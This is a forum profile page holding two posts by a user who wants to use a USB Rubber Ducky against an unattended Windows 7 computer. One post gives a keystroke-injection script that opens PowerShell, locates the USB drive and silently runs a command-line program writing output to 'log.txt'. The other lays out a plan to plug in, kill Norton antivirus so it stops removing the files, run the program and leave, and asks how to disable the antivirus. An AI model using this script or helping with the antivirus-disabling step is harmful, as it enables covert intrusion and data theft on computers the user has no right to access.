Jump to content

bigmat526

Members
  • Posts

    2
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

bigmat526's Achievements

Newbie

Newbie (1/14)

  1. This is the code: DELAY 1000 GUI R DELAY 100 STRING powershell DELAY 100 ENTER DELAY 1000 STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'D' } | select name DELAY 500 ENTER STRING cd $usbPath.name DELAY 100 ENTER STRING ./p /stext log.txt DELAY 100 ENTER STRING exit DELAY 100 ENTER "P" is the program i am trying to execute which support's command-line features. Sorry I am completely new to this, sorry for asking for so much but how would I manage to this?
  2. Hello everyone. I've flashed my Ducky to a Twin Ducky, hence I put on software (portable) with Command-Line Options. My goal is to successfully plug it into a Stand-Bye computer and actually make it work, make it execute. But the huge problem is the Anti-Virus. (Norton Small Business Edition). This AV keeps removing all the files and is really a pain in the ass. I was wondering if there was a way to once plugged in, let the Ducky (Temporary) Kill the Anti-Virus. Just so it doesn't have an scanning on, so it will not detect the file, and once everything is back up me and the Ducky will be gone. I have the Advantage because one, it's Windows 7 and the accounts that are being logged onto are Administrator-Privileged, so Pressing Yes or No with the Ducky will not be a problem. I really need help. 1. Plug in the Ducky 2. Payloads Activate; Kill's Anti-Virus (Short While just so files can get through) 3. Run the file (Command-Line) Be Out. I just need to learn how to Kill the AV. For Norton Small Business Edition it's pretty complex to just disable it straight from the Control Panel. Thanks, so much. -Mathew
×
×
  • Create New...